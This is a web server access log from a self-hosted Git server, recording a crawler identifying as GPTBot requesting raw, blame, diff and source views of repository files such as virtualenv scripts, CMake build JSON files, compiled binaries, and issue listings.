git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/bin/activate.csh" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/activate.csh" +[17/Feb/2026:18:06:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/bin/activate.csh" +[17/Feb/2026:18:06:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/static/js/app.js" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/static/js/app.js" +[17/Feb/2026:18:06:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/static/js/app.js" +[17/Feb/2026:18:06:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/bin/pip" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/pip" +[17/Feb/2026:18:06:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/bin/pip" +[17/Feb/2026:18:06:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/bin/pip" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/pip" +[17/Feb/2026:18:06:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/bin/pip" +[17/Feb/2026:18:06:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/static/js/app.js" [Client 74.7.227.38] [Length 1424] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/static/js/app.js" +[17/Feb/2026:18:06:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/.venv/bin/pip" [Client 74.7.227.38] [Length 949] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/pip" +[17/Feb/2026:18:06:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 12664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:18:06:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 12664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:18:06:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 12664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:18:06:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10010] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:18:06:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&state=all&type=all" [Client 74.7.227.38] [Length 9930] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:18:06:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 10163] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&state=all&type=all" +[17/Feb/2026:18:06:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13606] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:06:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" [Client 74.7.227.38] [Length 11619] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply" +[17/Feb/2026:18:06:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12780] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:06:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12778] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:06:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" [Client 74.7.227.38] [Length 19984] [Gzip 9.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply" +[17/Feb/2026:18:06:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13607] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:07:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" [Client 74.7.227.38] [Length 19986] [Gzip 9.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply" +[17/Feb/2026:18:07:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12778] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:07:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13605] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:07:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" [Client 74.7.227.38] [Length 19986] [Gzip 9.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply" +[17/Feb/2026:18:07:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10178] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:18:07:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 1173] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:18:07:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json?display=source" [Client 74.7.227.38] [Length 11632] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" +[17/Feb/2026:18:07:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" [Client 74.7.227.38] [Length 158] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" +[17/Feb/2026:18:07:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 964] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:18:07:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" [Client 74.7.227.38] [Length 11618] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply" +[17/Feb/2026:18:07:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 1173] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:18:07:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" [Client 74.7.227.38] [Length 23184] [Gzip 19.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" +[17/Feb/2026:18:07:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12460] [Gzip 6.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:18:07:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" [Client 74.7.227.38] [Length 19958] [Gzip 9.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply" +[17/Feb/2026:18:07:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" [Client 74.7.227.38] [Length 12317] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" +[17/Feb/2026:18:07:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10181] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:07:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13580] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:07:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12780] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:07:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" [Client 74.7.227.38] [Length 11617] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply" +[17/Feb/2026:18:07:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" [Client 74.7.227.38] [Length 12830] [Gzip 4.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply" +[17/Feb/2026:18:07:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" [Client 74.7.227.38] [Length 158] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" +[17/Feb/2026:18:07:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" [Client 74.7.227.38] [Length 10789] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" +[17/Feb/2026:18:07:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 964] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:18:07:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12779] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:07:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" [Client 74.7.227.38] [Length 12317] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" +[17/Feb/2026:18:07:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" [Client 74.7.227.38] [Length 23158] [Gzip 19.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" +[17/Feb/2026:18:07:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 964] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 